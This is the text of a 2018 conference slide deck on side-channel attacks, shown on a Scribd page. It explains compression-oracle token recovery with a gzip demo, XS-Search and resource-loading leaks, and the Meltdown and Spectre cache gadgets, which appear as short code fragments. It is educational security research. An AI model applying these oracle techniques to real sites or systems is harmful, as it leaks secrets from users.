Scribd Logo
Upload

Welcome to Scribd!

  • 06 Joseselvi Sidechannelsuncovered 180919165125

    Uploaded by

    parrese
    4 views47 pages
    06 Joseselvi Sidechannelsuncovered 180919165125

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    06 Joseselvi Sidechannelsuncovered 180919165125

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    4 views47 pages

    06 Joseselvi Sidechannelsuncovered 180919165125

    Uploaded by

    parrese
    06 Joseselvi Sidechannelsuncovered 180919165125

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 47

    Side-channels Uncovered

    Jose Selvi, RootedVLC 2018

    © NCC Group July 2018. All rights reserved


    But it’s just me J

    Jose Selvi (@JoseSelvi)

    15 years in the infosec industry

    Principal Security Consultant and


    Security Researcher at

    SANS Institute Community Instructor

    GIAC Security Expert (GSE)

    Blogger (sometimes): http://www.pentester.es


    $ ls -la /home/jselvi/rootedvlc18/

    1. Side-channels in Call For Papers

    2. How a side-channel works?

    3. HTTPS: Size-based Attacks

    4. HTTPS: Time-based Attacks

    5. CPU: Cache-based Attacks

    6. Lessons Learnt
    CFP Feedback
    Processing Feedback
    But… accepted in Ekoparty 2017
    $ ls -la /home/jselvi/rootedvlc18/ | tail -5

    1. Side-channels in Call For Papers

    2. How does a side-channel work?

    3. HTTPS: Size-based Attacks

    4. HTTPS: Time-based Attacks

    5. CPU: Cache-based Attacks

    6. Lessons Learnt
    Side-channels & Pizza Politicians

    DAY N DAY N+1 DAY N+2


    Back to the real world
    Action + Observing = Oracle
    What am I?
    $ ls -la /home/jselvi/rootedvlc18/ | tail -4

    1. Side-channels in Call For Papers

    2. How does a side-channel work?

    3. HTTPS: Size-based Attacks

    4. HTTPS: Time-based Attacks

    5. CPU: Cache-based Attacks

    6. Lessons Learnt
    How does web traffic work?

    DNS Request DNS SERVER

    WEB SERVER
    HTML
    (HTTPS)

    BROWSER

    Scripts

    Images WEB SERVER


    (HTTPS)
    Size-based side-channels
    Overview

    SERVER BRAIN CAPTURE

    CONSOLE
    Compression in theory (deflate)

    NCC Group is an awesome group of security geeks

    NCC Group is an awesome g(-20,4) of security geeks


    Compression in practice

    $ echo "token=BEEFCAFE1337 token=A" | gzip | wc -c


    44
    $ echo "token=BEEFCAFE1337 token=B" | gzip | wc -c
    43
    $ echo "token=BEEFCAFE1337 token=BA" | gzip | wc -c
    44
    $ echo "token=BEEFCAFE1337 token=BE" | gzip | wc -c
    43
    $ echo "token=BEEFCAFE1337 token=BEEFCAFE" | gzip | wc -c
    43
    DEMO
    CRIME vs BREACH

    CRIME

    BROWSER WEB SERVER


    (HTTPS)
    BREACH
    Compress before encrypt still a problem

    APP DATA

    COMPRESS &
    ENCRYPT

    USER DATA
    Search engine not CSRF-protected (XS-Search)

    /search/wrong
    100kb

    /search/rigg
    100kb

    BROWSER WEB SERVER


    (HTTPS)
    /search/righ
    200kb

    /search/rigi
    100kb
    What if response size is not stable?

    $ curl http://www.google.es | wc -c
    12424
    $ curl http://www.google.es | wc -c
    12401
    $ curl http://www.google.es| wc -c
    12372
    $ curl http://www.google.es| wc -c
    12437
    $ curl http://www.google.es| wc -c
    12423
    F****** Javascript from Hell…
    $ curl http://www.google.es
    […]
    google.time=function(){return(new
    Date).getTime()};(function(){google.lc=[];google.li=0;google.getEI=function(
    a){for(var
    b;a&&(!a.getAttribute||!(b=a.getAttribute("eid")));)a=a.parentNode;return
    b||google.kEI};google.getLEI=function(a){for(var
    b=null;a&&(!a.getAttribute||!(b=a.getAttribute("leid")));)a=a.parentNode;r
    eturn
    b};google.https=function(){return"https:"==window.location.protocol};goog
    le.ml=function(){return
    null};google.wl=function(a,b){try{google.ml(Error(a),!1,b)}catch(d){}};google
    .log=function(a,b,d,c,g){if(a=google.logUrl(a,b,d,c,g)){b=new Image;var
    e=google.lc,f=google.li;e[f]=b;b.onerror=b.onload=b.onabort=function(){del
    ete
    e[f]};google.vel&&google.vel.lu&&google.vel.lu(a);b.src=a;google.li=f+1}};g
    oogle.logUrl=function(a,b,d,c,g){var e="",f=google.ls||"";d||-
    1!=b.search("&ei=")||(e="&ei="+google.getEI(c),-
    1==b.search("&lei=")&&(c=google.getLEI(c))&&(e+="&lei="+c));c="";!d&&g
    oogle.cshid&&-
    1==b.search("&cshid=")&&"slh"!=a&&(c="&cshid="+google.cshid);a=d||"/"
    +(g||"gen_204")+"?atyp=i&ct="+a+"&cad="+b+e+f+"&zx="+google.time()+
    c;/^http:/i.test(a)&&google.https()&&(google.ml(Error("a")
    […]
    Resource loading side-channel (FIESTA)
    Resource loading side-channel (FIESTA)
    Resource loading side-channel (FIESTA)
    Resource loading side-channel (FIESTA)
    DEMO
    $ ls -la /home/jselvi/rootedvlc18/ | tail -3

    1. Side-channels in Call For Papers

    2. How does a side-channel work?

    3. HTTPS: Size-based Attacks

    4. HTTPS: Time-based Attacks

    5. CPU: Cache-based Attacks

    6. Lessons Learnt
    Overview

    SERVER BRAIN

    CONSOLE
    Size ~= Load time

    Nethanel Gelernter @ Blackhat USA 2016


    Measuring Time

    https://tom.vg/2016/08/browser-based-timing-attacks/
    Are timing attacks practical in HTTPS?
    Where is the Proof of Concept?
    $ ls -la /home/jselvi/rootedvlc18/ | tail -2

    1. Side-channels in Call For Papers

    2. How does a side-channel work?

    3. HTTPS: Size-based Attacks

    4. HTTPS: Time-based Attacks

    5. CPU: Cache-based Attacks

    6. Lessons Learnt
    Continuously improving performance
    Meltdown & Spectre

    https://meltdownattack.com/
    CPU Caching

    http://archive.arstechnica.com/paedia/c/caching/m-caching-2.html
    Out-of-order / Speculative Execution
    Meltdown (Out of Order Execution)

    access_kernel();
    access(probe_array[data * 4096]);

    again:
    mov al, byte [rcx]
    shl rax, 0x0C
    jz again
    mov rbx qword [rbx + rax]
    Meltdown (Out of Order Execution)

    00 01 02 03 04 05 06 07 08

    510 489 495 502 513 499 105 525 487

    again:
    mov al, byte [rcx]
    shl rax, 0x0C
    jz again
    mov rbx qword [rbx + rax]
    Spectre (Speculative Execution)

    if ( x < array1_size )
    y = array2[ array1[x] * 4096 ];

    1. array1[x] points to a SECRET byte

    2. array1_size and array2 are not cached

    3. previous values for “x” were valid (so branch


    predictor will probably think the current value of “x”
    is valid as well)
    Spectre (Speculative Execution)

    00 01 02 03 04 05 06 07 08

    510 489 495 502 513 499 105 525 487

    if ( x < array1_size )
    y = array2[ array1[x] * 4096 ];
    Why 4096??

    0 4096 8192 12288 16384 20480 24576 28672 32768

    access_kernel();
    access(probe_array[data * 4096]);

    if ( x < array1_size )
    y = array2[ array1[x] * 4096 ];
    $ ls -la /home/jselvi/rootedvlc18/ | tail -1

    1. Side-channels in Call For Papers

    2. How does a side-channel work?

    3. HTTPS: Size-based Attacks

    4. HTTPS: Time-based Attacks

    5. CPU: Cache-based Attacks

    6. Lessons Learnt
    Lessons Learnt

    • Compression is Evil

    • Cache is Evil

    • Speculative Execution is Evil

    • Exploiting side-channels is slow (but it works)

    • Avoiding side-channels is difficult (researchers find


    new ones over and over again).
    Thanks a lot! Questions!

    jose.selvi@nccgroup.com

    jselvi@pentester.es

    @JoseSelvi

    © NCC Group July 2018. All rights reserved

    You might also like